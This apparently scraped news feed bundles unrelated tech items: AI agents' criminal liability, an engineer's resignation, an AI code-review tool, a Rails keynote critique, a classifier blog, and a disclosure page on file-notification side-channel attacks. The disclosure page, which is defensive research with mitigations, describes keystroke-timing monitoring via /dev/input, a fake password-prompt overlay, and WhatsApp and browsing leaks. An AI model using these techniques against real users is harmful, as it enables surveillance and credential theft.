UNSW professor Lyria Bennett Moses, an academic expert in technology and law, said Australia’s criminal laws should be clarified to determine how fault, such as intention or knowledge, is applied to a corporation when its AI agent commits a crime.

skip past newsletter promotion

She said existing laws are clear if a human or corporation gains unauthorised access to restricted data, but it’s more complicated when an AI agent commits the physical element of the offence.

“The person is not the AI agent, so it’s not about what the AI agent intended. It’s about how you attribute that intention and that knowledge back to a corporation,” Bennett Moses said.

Bennett Moses said existing civil laws are more likely to deal with these sorts of incidents, that would allow a government or individual to seek compensation an AI company for harm “negligently caused by that corporation”.

“If their systems have suffered harm and there is financial loss, and that harm was caused by the negligence of a corporation, you’ve got a potential for litigation to get compensation for that harm,” she said.

“Here it seems to me much easier to hold a company liable, because if a company caused the harm, it’s not a defence to say that my bot did it.”

The opposition leader, Angus Taylor, told reporters the opposition would be open to working with the government to hold companies accountable.

“I’ve long believed that data breaches need to be dealt with in an appropriate way and those responsible for the data breaches need to be accountable for it … But we’ll wait and see what the government has in mind.”

OpenAI spokesperson Drew Pusateri said on Thursday the company was conducting an extensive review of “misaligned model activity during training and evaluation” and was “notifying third parties when our review identifies potential impacts to their systems”.

“During this review, we identified activity involving several Australian government websites and services as our models attempted to look up answers, and available statistics for questions about Australia during an internal evaluation,” Pusateri said in a statement.

Pusateri said OpenAI was supporting investigations and that its review was ongoing, adding it was committed “sharing what we learn as that work continues”.

Goodbye Google

Hacker News
robert.ocallahan.org
2026-09-25 00:52:02
Comments...
Original Article

Thursday 24 September 2026

Today I’m sending the following email:

I’m resigning from Google today.

This has not been an easy decision. I love my colleagues and my work environment, and being paid handsomely to solve fun puzzles has been amazing. But my team’s goal is ultimately to make AI much cheaper and lower-latency, and I don’t think that’s good for people right now: I firmly believe AI progress is currently far too rapid (and I have doubts about the destination too). It’s practically impossible for me to move to a different Google project that wouldn’t accelerate AI (partly due to my ties to New Zealand, where Google prefers not to do engineering), so my hands are tied.

There are millions of people contributing to AI acceleration and taking my foot off the accelerator will have a very small impact … but not no impact; some of my skills are rare. I explored trying to positively influence events from within GDM, but that effect does not seem to be strong, and I can have influence outside Google too. It’s tempting to just turn a blind eye to the impact of my work, but that would not be a Jesus-following thing to do. I have written more about these tradeoffs on my blog.

I don’t know exactly what I will do next. I will continue maintaining Pernosco and rr, and relatedly I plan to investigate how AIs debug code today and whether and how debugging tools could help. I have other project ideas I want to work on, some potentially lucrative, some not. Maybe I’ll find an existing project that’s compelling. I definitely want my future work to be unambiguously pro-human.


First, for those who don’t know me: I’ve been in the tech industry a long time and I have a lot of Silicon Valley connections, but I live in New Zealand so I live outside the industry bubble and also outside the American bubble. I’m a Christian, and actually an elder and occasional lay preacher in the English-speaking congregation of Auckland Chinese Presbyterian Church in Auckland’s inner city. That is, I am not a “tech bro”, nor do I fit into the self-described “rationalist community” … but I do think many of their arguments deserve to be taken seriously.

I have a lot of thoughts about AI, but I’m not going to elucidate them all in this post. In summary, I think the existential risks many people are warning about deserve to be taken seriously; a lot of the phenomena predicted by the “doomers” have come to pass (e.g., reward hacking, misalignment, deceptive models, model eval awareness, psychotic swarms). However, I am not convinced the chance of ASI doom is 100%. Rather, I think the risk is real but uncertain — but that itself is very alarming! We are morally obliged to make a massive effort to minimise such risk, and most likely the risk is high enough that aiming for ASI in the near future is inherently irresponsible. I’m also very concerned about other AI-related issues: cognitive surrender , AI-induced psychosis and loneliness, power concentration, economic disruption, cybersecurity, lack of accountability, and so on. I think the potential benefits of AI are quite unclear and currently, if I had to bet, I’d bet the negatives will outweigh the benefits … but I’m uncertain about that too.

Here are some things I’m confident about. I’m confident that the people in AI labs who are issuing warnings about AI are generally sincere. I’ve talked to many people in Google Deepmind about these issues and almost all of them have sincere and serious concerns, whether or not they voice them in public. I have seen no hard evidence that people are hyping AI risk as a means to boost company stock prices or regulate away their competitors. (I think national and international regulation is desperately needed!) I’ve seen a lot of arguments of the form “you can’t trust those people”, and maybe that’s true, but such distrust is not a good reason to disregard their warnings, as Russell Moore eloquently explained recently.

I’m confident that AI capability will continue to keep increasing steadily as long as we keep working on it. I wish that AI would hit some kind of plateau, or that we would identify important human cognitive abilities that AI will never replicate without a paradigm shift, but I don’t expect those wishes to come true. Model progress on benchmarks seems as fast or faster than ever, and with it, qualitatively new capabilities keep emerging. Even if model progress stopped today, we could spend years effectively unlocking new capabilities via new prompts and harnesses. Many prominent AI detractors (looking at you, Zitron and Doctorow) seem to think that AI is some kind of scam that won’t really work. I think it will.

I’m very confident that even if there is a path to a better future through AI, the current rate of change is far too high . AI is developing faster than humans can individually and collectively understand it and adapt to it. People trying to plan their futures, e.g. trying to plan for a world several years in the future as they enter university, can no longer do so the way previous generations could. I don’t think we’ve seen anything like this before, certainly not in the previous technological shifts I have lived through (PCs, the Internet, smartphones). Even during the Industrial Revolution, not only was change much slower but there were large swathes of human activity that were not and could not be directly impacted by the new machines. That is not very true anymore.

Why leave now and not earlier? It’s nothing to do with the recent spate of viral resignations or “AI slowdown” warnings; that’s a coincidence. I’ve had this date in mind for a while, because I have a long-planned ten-day backpacking trip with my friends starting Monday ( Abel Tasman and Wangapeka tracks) and I wanted to go before that.

I did not work directly on AI capability, but on improved tools for hardware chip design. I really enjoyed the work, and for a while I told myself it was relatively harmless, but over time God forced me to confront the reality that the main impact of these tools will be to accelerate the design of a new breed of AI chips, which if successful will make AI much cheaper and faster — making AI more pervasive, and also more capable since we’ve learned to boost capabilities by burning more inference tokens. My duty to be a good employee meant I had to have an honest conversation with my skip manager and tell them I was at best reluctant to see their project succeed! Even after that I wanted to be really confident in my decision, because the great deal I had working for Google in New Zealand will probably never be available again. (Staying at Google and switching to a different engineering team not accelerating AI was impractical, because Google doesn’t have other engineering teams in New Zealand.) My aforementioned duty to my employer, and my respect for the people, was also a factor for not leaving too abruptly and trying to hand over my work in a reasonable state.

What next? The most important thing I’m confident about is that the Jesus of the Bible is real and therefore God has a plan that’s good for us. I don’t know what that plan is (and wish I did) but it lets me sleep at night in spite of the AI chaos. I expect his plan involves me continuing to make the best use of my talents. Even if the plan is for Jesus to return to rescue us from our folly, we’d better be busy when he returns! So, as long as the talent God gave me is valuable, I want to keep working. As I mentioned above, I plan to continue maintaining Pernosco and rr . Under the Pernosco umbrella, I plan to study how AI agents debug code and whether debugging tools that can make them more effective at that. I want to use AI agents to bring some of my hobby project ideas to life. I’m keen to reap the benefits of AI, but cautiously, in ways that benefit humans and keep my own mind sharp. As much as I can, I will continue practicing and advocating for that here in New Zealand.

Jev Based Code Review

Hacker News
github.com
2026-09-25 00:49:23
Comments...
Original Article

Most PRs that are generated by agents today get YOLO merged because its hard for human mind to comprehend when your agent just suddenly shows up with 230 file changes. This is an attempt to reduce the mental burden by classifying each change in a review to P0, P1, P2. Only P0 are shown by default. The priorities are configurable. The diffs are also show using a natural language. The original code is one toggle away.

It runs on your computer, for reviewing your own coding agent's PRs, and posts nothing to GitHub.

Jev-Code-Reviewer on the demonstration PR

Watch the recording · Open the demo PR . The bundled recording uses real Jev classifications and labeled, prepared explanation copy ( provenance ).

Quick demo

Needs Node.js 22+.

git clone https://github.com/egma-ai/jev-code-reviewer.git
cd jev-code-reviewer
npm install
npm run demo

Open http://127.0.0.1:4731/demo for the replay, which makes no provider calls, or load the extension (below) and open the demo PR's Files changed page .

Review your own PR

Needs the GitHub CLI signed in ( gh auth login ) and a local clone whose origin is the PR's repository.

npm link                 # adds the jev-reviewer command
jev-reviewer setup       # stores your TypeSafe and OpenAI keys; run it in your own terminal
jev-reviewer doctor      # checks tools, key sources, the local server, and provider access
jev-reviewer serve       # leave running
jev-reviewer analyze --pr https://github.com/OWNER/REPO/pull/123 --repo /path/to/clone

Then in Chrome:

  1. Open chrome://extensions , turn on Developer mode , click Load unpacked , and pick this repo's extension/ folder.
  2. Run jev-reviewer token | pbcopy . In the extension popup, open Connection , paste, and click Save . It should say Paired .
  3. Open the PR's Files changed page ( /pull/<n>/files ) and turn on Show logic in place of code .

Optional: uv tool install graphifyy adds a local code graph for better context. To have your coding agent run analyze after it opens a PR, install the agent skill .

Good to know

  • Your code leaves your machine. analyze sends changed code and nearby context to TypeSafe and OpenAI. The extension only talks to the local server on 127.0.0.1:4731 .
  • Keys are stored in ~/.config/jev-reviewer/credentials.json (owner-only, not encrypted). Prefer this over exported variables, which a coding agent's shell often cannot see. Replace an OpenAI key with node scripts/setup-keys.mjs --replace-openai .
  • Coverage is capped. The first 12 change units (diff hunks) in path order are analyzed; --max-units allows up to 100. Files with an unanalyzed change keep GitHub's code, and the CLI and popup say how many.
  • Classic Files changed page only. GitHub's new /changes page is not supported yet; switch back under your profile picture → Feature preview .
  • Old reports are never shown. If the PR has newer commits, the extension keeps GitHub's code: rerun analyze , then click Refresh report .
  • Priorities mean attention, not correctness. P0 files open by default; P1 and P2 start collapsed. Tune them by copying config/policy.json to .jev-reviewer.json in the reviewed repo, or pass --policy .

Development

npm test
node scripts/test-extension.mjs   # needs Chromium and port 4731 free

See architecture , demo guide , and extension details .

MIT.

File Notification Attacks: Side-Channel Leakage from the File-Notification System on Linux, Android, Windows, and macOS

Lobsters
inoti.fyi
2026-09-24 22:50:41
Comments...
Original Article

Side-Channel Leakage from the File-Notification System on Linux, Android, Windows, and macOS.

Accepted at The ACM Conference on Computer and Communications Security (CCS) , November 15-19, 2026 — The Hague, Netherlands


Illustration

File-notification systems tell applications when files change, e.g. , opened, closed, written, deleted. With only read permission on a file or directory, an attacker can watch these notifications and reconstruct user behavior. We find generic issues similar on each of Linux, Android, Windows, and macOS. However, there are three issues that are severe and unique to their platform:

1. On Linux, watching a readable directory reports every event on a file inside it, even one the attacker cannot read directly. The most severe case of this is with /dev/input , discussed in Inter-Keystroke Timing below.

2. On Android, FileObserver bypasses the FUSE layer's per-app storage view, letting an unprivileged app watch another app's private folder. We show this against WhatsApp, revealing exactly when photos, videos, and files arrive or get deleted, detailed in Revealing Private Communication below.

3. On Windows, watching the root directory ( C:\ ) reports the full path of every file touched anywhere on the system, regardless of permissions, even across users 🙂. Microsoft considers this an ✨ undocumented feature ✨. The most severe case we found is leaking which websites another user visits in real time, shown in Direct Website Leakage below. Our findings got Microsoft nominated for the lamest vendor response category at the Pwnies Award 2026 .


On Linux, the file-notification subsystem is called inotify , allowing cross-user applications to mount watches on files or directories since kernel 2.6.13 (2005).

On Android, this subsystem is called FileObserver class (since 2008), a Java wrapper around inotify .

Windows offers the ReadDirectoryChangesW Win32 API, available since Windows 2000 . With this API, cross-user applications can mount watches on directories, getting notifications for operations on the directory, or files within the directory. In dotnet, the FileSystemWatcher class is wired to ReadDirectoryChangesW.

On macOS, the File System Events API allows for applications to know when files in a watched directory change. This API has been around since Mac OS X Leopard version 10.5 (2007); archived link to Apple Developer Connection – Leopard OS Foundations Overview.


Demos

We demonstrate four interesting case studies below. The first two are on Linux: inter-keystroke timing and authentication-UI redress. The third is on Android, and the fourth video is on Windows: direct website leakage.

The major point to remember on all systems is that the contents of these files are unknown . We only get notifications on files, which we show is enough to leak user, system, and application behavior. In some cases, we also learn about the existence of files that we traditionally could not have known.


1. Linux: Inter-Keystroke Timing

On Linux, mounting an inotify watch on a file without read-permission results in a permission denied error. However, if the file’s parent directory is readable, watching that directory will report all events that occur on the file.

This means that if a user can’t read /dev/input/event4 , adding an inotify watch on the file results in a permission-denied error. However, if the user can read /dev/input – i.e. , they can list the files in the directory – then an inotify watch on the directory succeeds, and the user receives notifications for all files inside it, as shown below:

Figure 1. Bypassing read permissions on Linux by mounting a watch on the file's parent directory.

On this system, event4 happens to correspond to a keypress. Important to note is that which key is not leaked, but only that a key was pressed. Although this may not sound terrible, there has been 2+ decades of research on inter-keystroke timing attacks: the time taken between keys leaks information. For example, in the word ‘WindRunner’, users tend to type the second ‘N’ faster than the other characters due to the finger already being over the ‘N’ key.

These include: Song et al. (2001), Zhang and Wang (2009), Monaco (2018), and most recently Qiu et al. (2025).

Video 2. Cross-user watcher mounted on /dev/input gets a notification upon every keypress.

This behavior is also observed when two different users are logged on to the same server via SSH. One user can observe whenever* the other user presses a key by monitoring /dev/pts .

* The input should have a text update on the terminal. Typing into sudo password prompts with pwfeedback disabled does not generate notifications.

Video 3. On an ssh server, a cross-user watcher mounted on /dev/pts gets a notification upon every keypress.


2. Linux: Authentication-UI Redress

We show an authentication-UI redress attack on KDE Plasma running on Wayland, where a same-user process watches /usr/bin/pkexec of polkit for accesses to detect when an authentication prompt appears. As soon as the real password dialog is about to open, the attacker quickly draws a fake password window on top of it, tricking the user into entering their credentials. Even though Wayland is designed to block input snooping, KDE’s focus-stealing prevention isn’t designed to be a security mechanism, according to KDE Plasma’s security team.

Video 4. Watching /usr/bin/pkexec for accesses lets an attacker know when the password prompt is going to pop up, allowing them to draw a fake prompt over the real one. The visual difference in the dialogues here is deliberate.

Since SteamOS also uses KDE Plasma 6, here’s a picture of the KDE terminal (Konsole) drawn over the authentication prompt window on SteamOS (this was inside a VM so it may differ in practice):

Figure 5. On SteamOS, we can bring a window in front of the password authentication window, since it also uses KDE Plasma 6.


3. Android: Revealing Private Communication

As stated before:

On Android, FileObserver bypasses the FUSE layer’s per-app storage view, letting an unprivileged app watch another app’s private folder. We show this against WhatsApp, revealing exactly when photos, videos, and files arrive or get deleted.

Every app is assigned a private folder at /sdcard/Android/ , hidden from other apps through Android’s FUSE layer, and Android’s FUSE layer is supposed to keep it hidden from every other app. Normally, an unprivileged app calling File.listFiles() on WhatsApp’s private media folder, e.g. , /sdcard/Android/media/com.whatsapp/WhatsApp , gets empty subfolders and no files returned by the kernel. The FUSE layer filters WhatsApp’s files out of the listing entirely, and therefore the folder looks empty to other apps. Our research shows that this protection doesn’t extend to file notifications: a second unprivileged app with no permissions can still mount a FileObserver watcher on that same folder and gets notified of every file event (plus file name!) inside it, despite not being able to list a single file in it.

For example with WhatsApp, incoming media shows up as a MOVED_TO event with the file name. In our logs, IMG-20260401-WA0011.jpg is moved to WhatsApp Images/ about 100ms after WhatsApp finishes downloading and decrypting it (the .Shared/ ), as seen from our proof-of-concept app’s (enormous) logcat output:

Left: On WhatsApp, our colleague Roland sends an image when asked to send a WhatsApp image. Right: The unprivileged application that observes a new incoming WhatsApp Image.

Sent media is kept separate, so the attacker also learns whether the image was sent or received. Images are located in WhatsApp Images/Sent/ , documents are located in WhatsApp Documents/Sent/ , everything else received stays in the parent folder. Since file names alone reveal the media type (image, video, voice note, or document) and their creation time, an attacker builds a timeline of exactly what and when a user sent and received. Deleting files also generates events, so removing a message’s media afterwards can be observed.


4. Windows: Direct Website Leakage

On Windows, mounting a ReadDirectoryChangesW watch on a non-readable directory results in a permission-denied error. However, mounting it on the root directory (e.g., C:\ ) bypasses this restriction, causing Windows to report all filesystem events system-wide along with the filename , regardless of whether the affected files are readable. In our responsible disclosure with them, Microsoft said that they consider this an undocumented feature.

One example where filenames leak information is the directory created by browsers when visiting a website. Firefox creates and uses a separate directory for every website that uses local storage, IndexedDB, or cache. Notably, this directory contains the name of the website. On Firefox, an attacker can reliably monitor top-1000 websites with an F1 score of 97.8%.

Video 6. A cross-user watcher mounted on C:\ reports events on all files, even if the user can’t read them. In this video, an attacker filters for “http,” while another user visits arstechnica.com in Firefox.

Here are more examples:

Figure 7. From top-left (clockwise): lemmy.world, flightradar24.com, mastodon.social, amazon.de, wikipedia.org, twitch.tv.


Team

The team comprises of researchers from the Institute of Information Security (ISEC) at Graz University of Technology , Austria:

  • Sudheendra Raghav Neela
  • Xufan Zhao
  • Jeanette Angelika Wultsch
  • Hannes Weissteiner
  • Stefan Gast
  • Florian Draschbacher
  • Daniel Gruss

Some Questions and Answers

1. Am I affected?

If you use Linux, Android, Windows, or macOS, you are most certainly affected to varying degrees.

While macOS exposes the least information via only globally readable files, with no leaks of private information (unlike Linux, Android, and Windows), we find that user, application, and system behavior can still be tracked, although to a much smaller extent.

2. Are there fixes?

» Linux «

In December 2025, the Linux issue was partially mitigated to not generate ‘access’ / ‘modify’ events on special files, essentially character files, which the files in /dev/ basically are. We thank Amir Goldstein, Jan Kara, Greg Kroah-Hartman, and the Linux Kernel Security Team for discussing and partially mitigating the issue. While it’s not fully mitigated, the most severe issues are mitigated. This issue was assigned CVE-2025-68788 and was mitigated in kernels 5.10.248 , 5.15.198 , 6.1.160 , 6.6.120 , 6.12.65 , and 6.18.3 .

You can check whether this command generates notifications when you press keys on the keyboard:

inotifywait -m -e access,modify /dev/input

If you do not see any notifications appear (like Video 2 above), then your kernel has the mitigation in place.

» KDE «

In our emails with the KDE security team, they replied that focus-stealing prevention is not meant as a security measure, but rather to avoid race conditions with annoying popups.

What we find works for the time being in KDE Plasma 5 and 6:

Open a terminal, type pkexec ls (doesn’t matter where). Right click on the top of the password window > More Actions > Configure Special Application Settings > Add Property > Keep Above Other Windows (click +) > close the properties window > Set “Keep above other windows” to “Force” and click “Yes” > OK.

Here’s a video to walk you through it:

Video 8. Enabling the password prompt's window to always be atop other windows on KDE Plasma 6.

» Android «

None

» Windows «

Well after our paper was submitted and despite our report to Microsoft, we independently came across: Access check enhancements to prevent unauthorized disclosure of file paths which are similar to our Windows findings, the bugs reported to Microsoft by Sébastien Huneault in April 2025. Microsoft introduced a new registry policy, EnforceDirectoryChangeNotificationPermissionCheck , which mitigates the behavior we report. This policy is disabled by default , i.e., all the attacks we report in this paper work out-of-the-box on Windows systems. The earlier linked post has instructions to enable this on your device.

» MacOS «

None

3. What can be leaked?

The major point to remember on all systems is that the contents of these files are unknown . Only notifications on files are leaked, which we show is enough to leak user, system, and application behavior. In some cases (Windows, Android), we also learn about the existence of files that we traditionally could not have known.

Note that the attacks we present require a local, cross-user attacker (think of a compromised user/system service), or a supply-chain-attacked package.

4. Have these attacks been exploited in the wild?

We are unaware of any such case.

5. Can I use the logo?

Sure, it’s licensed under CC-BY 4.0 : Download SVG , PNG .

Please attribute it this way:

Creator: Brinda Neela
License: CC-BY 4.0
Link: https://inoti.fyi
6. Is there proof of concept code?

Yes, check out: https://github.com/isec-tugraz/file-notification-attacks .

Acknowledgements

This research is supported in part by the European Research Council (ERC project FSSec 101076409), and the Austrian Science Fund (FWF SFB project SPyCoDe 10.55776/F85). Additional funding was provided by a generous gift from Intel. Any opinions, findings, and conclusions or recommendations expressed in this paper and website are those of the authors and do not necessarily reflect the views of the funding parties.

What About Rails?

Hacker News
jardo.dev
2026-09-24 22:50:16
Comments...
Original Article

David Heinemeier Hansson is, for better or worse, still in charge of Ruby on Rails. I’d love to stop paying attention to him, but I build applications with Rails, so his actions affect me and my clients. Yesterday, he gave the opening keynote at Rails World 2026, where he laid out his vision for the future of Rails.

Or that’s what his talk should have done. His keynote had very little to do with Rails. Here’s what he did talk about, and what it means for Rails.

The Gist of It

I have retired from being a professional programmer.

Yes, he said that. No, that doesn’t mean he’s stepping away from software development. He now styles himself a “maker.” He now claims that English is the best programming language (because LLMs) and that we don’t even necessarily need to read the code the LLMs produce.

Writing code by hand is no longer an economically productive enterprise for the vast majority of programmers working at the vast majority of companies.

He’s all-in on LLM code generation, so he’s changed his stance on both native applications and the Rust programming language. In his eyes, products like Hey were never really meant to be web apps.

He’s argued for years that the Rails stack allows small teams to build ambitious products. Now, as 37signals are building the next version of Hey, they are going with a different stack. In his telling, the bottleneck is gone, so they’re using LLMs to build native applications for every platform they support.

On the server side, they are going with Rust. DHH maintains that the language is hideous and that humans shouldn’t be subjected to it, but that it’s great for LLMs. Since he’s not reading the code anyway, he can now appreciate the performance and stability of the language.

He claims to have written 150k lines of code in August of this year, having previously averaged about 30k lines per year in the pre-LLM era. (He admits much of it is “verbose” Rust.) While Ruby made up about half his work over the last two decades, it sits at only 3% of what he wrote this year.

The new strategy is rooted in the idea that humans reading code should be the exception, rather than the norm, “like seeing a bug in Sentry.”

That’s today. By the end of the year, it will be virtually all domains, virtually all programmers, virtually all companies. So we best get used to it.

He also wants to see every service offer a CLI so that he (read: “his agents”) can interact with it without using the UI.

We can now want everything. We can now get everything.

The tail end of his talk focused on his vision of LLMs enabling everyone to create whatever their hearts desire. He spoke about his work on Omarchy and finished by urging the audience to reject AI skepticism and doomerism:

The black pill is for fucking losers. Don’t be a loser.

A Rails-shaped Hole

DHH used the opening keynote of the world’s premier Rails conference to announce that a flagship Rails app was leaving Rails. The Rails content amounted to it still being a great fit for web applications (like Basecamp) and being great for building with AI.

For twenty years we’ve been sold Rails as the framework for “small teams, ambitious products”. I’ve been on a ton of teams that were able to do a lot with a little because of Rails. You probably have too.

Hey was and is a web app because making web apps for small teams was how you could be productive. In the old times, that is, 5 minutes ago…

His vision for Rails has narrowed. Rails wasn’t a preference. It was a workaround. It’s now the platform of choice for “web apps of necessity”. Convention over configuration has been reframed as “token efficiency”. Evil Martians’ agent evals are simply a reassurance; AI is good at Rails, so you don’t need to leave.

There’s a more charitable framing. Rails is a mature, stable framework. Stability is good for agentic development. But he told us only 3% of his work this year was Ruby. Nothing in this talk attempts to distinguish a mature platform from one whose creator is no longer paying attention.

The CLI demands were baffling. 37signals differentiates their products with opinionated UI/UX, not novel features. They are rewriting Hey as six native apps because the web fidelity isn’t good enough. So UI matters enough to justify complete rewrites, but also everyone just wants CLIs? If every product is used by an agent driving a CLI, what’s going to differentiate Basecamp or Fizzy from the cheapest alternative? I think this strategy needs a Rework.

I’m left wondering what the vision for Rails really is now, and who’s going to drive it. While Mosscap forked on political grounds, part of their core argument is that Rails is done. It’s stable and needs only maintenance. Hanami has a roadmap and a vision for the future of building web applications with Ruby. While much of the day-to-day work on Rails comes from Shopify and elsewhere, DHH historically drove the vision. Now, is he arguing himself out of a business, or has he already left and not told the room?

The creator of Rails is taking one of his flagship products off the stack. His Ruby output has dropped to 3%. He believes hand-written code will be history for virtually everyone by December. In the face of this, he offers flattery.

Now maybe that’s a little scary. Like maybe we’re gonna get a little competition. Who’s afraid of a little competition? Aren’t you better? Don’t you know more? Of course you do. You’re a fucking Rails programmer. You’re the best of the best. This is goddamn Top Gun I’m looking at here. Embrace that. With gusto.

This is reassurance instead of a plan. I bet it worked in the room too; confidence always does. But it’s totally hollow. You could say the same thing to a room of Django or Laravel or fucking Spring Boot developers word for word . The one moment he talked directly to Rails developers, he chose to say nothing about Rails.

The Hallucinated Elephant in the Room

On to the AI claims. For context, DHH runs a company that makes simple, user-friendly products. They’re so simple that even before the advent of LLMs they would periodically fully rewrite their apps to create new versions.

37signals succeeds on product and marketing, not on solving hard technical problems. I’m not hating; lots of people love their apps. I’m just saying that their new Kanban app’s success is going to be driven by product decisions and marketing. Kanban board is not one of the hard problems of computer science.

So does his approach (never looking at the output, evaluating the result from the outside) work? These tools have come a long way. They still make all kinds of mistakes, but as long as there’s a human in the loop to verify the results and reprompt, it works fine, at least for small apps and easy problems.

It’s hard to take the numbers in this talk seriously, because David keeps undermining them. Throughout he presents topics as settled, despite failing to support them coherently.

He admits that lines of code is a poor measure and grants that we can’t compare across languages fairly, then compares 150,000 lines of LLM output in August to his 30k/year average, then immediately concedes that he tolerates Rust code from LLMs that he “would never tolerate from [his] Ruby code”. Lines of hand-written, concise Ruby and LLM-generated Rust slop are not comparable. He seems to know this, but compares them anyway.

In the past 20 months, I have written half as much code as I did in the previous 21 years.

Apples to oranges again, and he’s struggling with the definition of “to write”. He didn’t even read the Rust his LLM generated.

The Hey Next numbers are similarly problematic. There’s no questioning that Rust is a more performant language than Ruby, but it’s another unfair comparison.

…we end up with a backend that requires 99% less CPU, 95% less memory, and the only reason it needs 10 hosts is for redundancy. In fact, our back-of-the-envelope calculation has led us to believe that Hey’s peak traffic could probably be served on a single Raspberry Pi.

A pure-Ruby backend with no web frontend would also be vastly cheaper to run than the existing Rails version. Which gains come from Rust and which are from dropping the web app is unknowable. And none of it is an argument for his agent thesis. A team that likes writing Rust could build the same system. But he doesn’t think humans should write Rust.

His claims about the 10x (and 100x and 1000x) programmer are equally suspect. The study in question was measuring the difference in developer tooling (not developer productivity) and has been heavily critiqued from a number of angles. The “average of 10x” is just folklore, not even present in the original paper.

Big productivity differences between developers are real. I’ve seen them myself. But somewhere between the paper and the stage we went from 28:1 to 1000:1, and the only place that’s settled is a keynote where only one person has a mic.

Then there’s Basecamp 5. David reports that it resulted in an architecture “like Swiss cheese”. He blamed the models. Unreviewed, uncoordinated contributions will degrade architectures whether they come from agents or people. He argues later in the talk that “the price of repetition has gone to near zero”. Basecamp 5 is what nonzero looks like. We’ve already seen this failure mode in DHH’s own circle. Tobi Lütke recently lamented that “slop grenades” are a serious hazard when doing heavy agentic development.

David asks us to learn from history, from the ATM story. People feared that ATMs would spell the end of bank tellers. Instead, we got the opposite. There’s a problem with his story, though: all the details are wrong. The decade is wrong. He references the wrong economist . The teller numbers are an order of magnitude off. The ending is already backwards . Perhaps a human should have double-checked this talk.

“Never look at the code” and “security, something’s coming, get ready” are fifteen minutes apart in this talk. That’s a hell of a gulf, and there’s no bridge. I’m being told to believe that one company’s nascent effort to (re)build a relatively simple email product extrapolates to “virtually all programmers, virtually all companies, by December.”

Finally, where a strategy should be, there’s a plea for optimism.

I also think maybe some of [the concerns] are a little overstated. I mean, maybe, but probably not. I mean, some of them maybe a little more.

Optimism isn’t a strategy, and it doesn’t override facts. The facts in this talk do not justify the optimism. I tuned in curious to see what’s next for Rails. I still do not know, and I don’t think DHH does either. He didn’t even demonstrate that he’s thinking about it.

That’s what bothers me most. I’m skeptical of his AI claims, but that’s not the real issue here. I’m also not mad about the Hey rewrite. He’s allowed to build his apps with whatever tools he wants. I don’t even use Hey.

The problem is that he stood up at Rails World and told everyone that he was moving his product off Rails and the best thing he could come up with to say to people still using Rails was that we’re “the best of the best.” Thanks, I guess.

Maybe Rails is done, in the way the Mosscap project claims. Maybe it’s time to focus on stability and maintenance. If that’s the plan, someone needs to say it. If it isn’t, then let’s hear about where we’re headed.

DHH did neither. He just told us the future is going to be great and warned against AI doomerism. I’d have settled for a slide or two about Rails.

Jev and System One Models: Calibration Beats Accuracy

Hacker News
www.kartikpansuriya.com
2026-09-24 22:24:21
Comments...
Original Article

Last week TypeSafe AI released Jev , which it calls the first “System One model”: a model that does not chat, does not write, and does not reason step by step. It answers structured questions about an input, in a single forward pass, with a probability attached to every answer. Most of the coverage has focused on speed. I think the more interesting claim is the one about calibration , because calibration is the thing that has quietly limited every production classifier I have shipped, including the one in my COMPSAC paper .

This post is my attempt to work out what Jev actually changes, where it fits in a real ML stack, and how I intend to test the claim rather than take it on faith.

What Jev is, without the marketing Link to section: What Jev is, without the marketing

Jev is built around three ideas, per TypeSafe’s launch post:

  1. Non-autoregressive output. A normal LLM produces its answer one token at a time, and each token depends on the last. Jev emits the entire structured answer at once. That is where the speed comes from: TypeSafe quotes 70–500 ms end to end and “40x–200x faster” than frontier LLMs on equivalent tasks. 1
  2. Typed questions, not prompts. You send a state (text, structured data, or a message history) and a set of questions . Each question is one of three types: choice (pick from a set, get a probability per option), score (rate against ordered levels, get a continuous score and distribution), or noul (a yes/no, returned as the probability the statement is true). 2 Every question in a request is evaluated in parallel, so adding questions barely changes latency.
  3. Training for calibration. The model is trained with what TypeSafe calls reinforcement learning for calibrated decisions (RLCD). The stated goal is “epistemically honest probabilities” rather than the human-preference or verifiable-reward objectives that chat models are tuned on. 1

The constraints are just as important as the features. Jev cannot generate free text. A choice question supports at most 255 options. There is no image input yet. Pricing is $0.042 per million input tokens with output tokens free, and access is currently by waitlist. 1

So it is not a smaller GPT. It is closer to a very fast, very general tabular classifier that reads unstructured input and returns a typed decision with a confidence you are meant to be able to trust.

Why calibration, not accuracy, is the real bottleneck Link to section: Why calibration, not accuracy, is the real bottleneck

Here is the part of my own paper I keep coming back to. We predicted whether a pull request would be merged, using only signals available at submission time. Random Forest hit an F1 of 0.958. The majority-class baseline, which says “merged” to everything, hit 0.957. The number that actually separated a useful model from a useless one was ROC-AUC: 0.676 for the forest versus 0.500 for the baseline. And even at that, we wrote plainly that the models “should not be treated as perfectly calibrated probability models” and were fit for triage, not for automated accept/reject decisions. 3

That is not a quirk of one dataset. It is the normal shape of a production classifier:

  • Accuracy saturates early. On imbalanced problems, most of the available accuracy is free. The hard part is the ranking and the confidence.
  • Downstream logic needs probabilities, not labels. “Route this order to manual review if the model is less than 80% sure” only works if 80% means 80%. If the model says 0.95 on things that are right 70% of the time, every threshold you set is a lie.
  • Miscalibration is invisible in the usual metrics. F1, accuracy, even AUC are all threshold or rank metrics. A model can have a fine AUC and terrible calibration, and you will not know until the business rule built on top of it starts misfiring.

The standard fixes are post-hoc: Platt scaling, isotonic regression, temperature scaling. They work, but they are another fitted component that drifts when the data does. What Jev is claiming, if I read it correctly, is that the probabilities come out of the model already honest, because honesty was the training objective. If that holds on tasks outside TypeSafe’s own benchmarks, it removes a whole layer of glue from production ML systems.

That “if” is the entire question, and it is testable.

Where a System One model fits in a real stack Link to section: Where a System One model fits in a real stack

I work on ML inside a wholesale distribution business. Almost none of it is chat. Most of it is small, repeated decisions that sit between two systems:

Decision Today Why it is annoying Does Jev’s shape fit?
Is this inbound order an exception that needs a human? Rules plus a small classifier Rules rot; retraining the classifier is a project Yes: a noul with a threshold
Which regulatory product category does this new SKU belong to? Keyword rules, manual cleanup Vendor descriptions are messy free text Yes, if categories fit in 255 choices
How urgent is this customer support message? Nothing, or an LLM call that takes seconds Latency and cost make it hard to run on every message Yes: a score over ordered levels
Which delivery route should absorb this late order? Constraint solver Not a classification problem at all No
Write the customer-facing note explaining a substitution LLM Needs generated text No

The pattern is clear. Anywhere I have an LLM doing a job that is really classification wearing a chat costume , a System One model is a plausible replacement with two orders of magnitude less latency and cost. Anywhere I have hand-written rules that keep breaking because the input is free text, it is a plausible replacement for the rules. Anywhere the job is generation or optimization, it is the wrong tool and TypeSafe says so themselves.

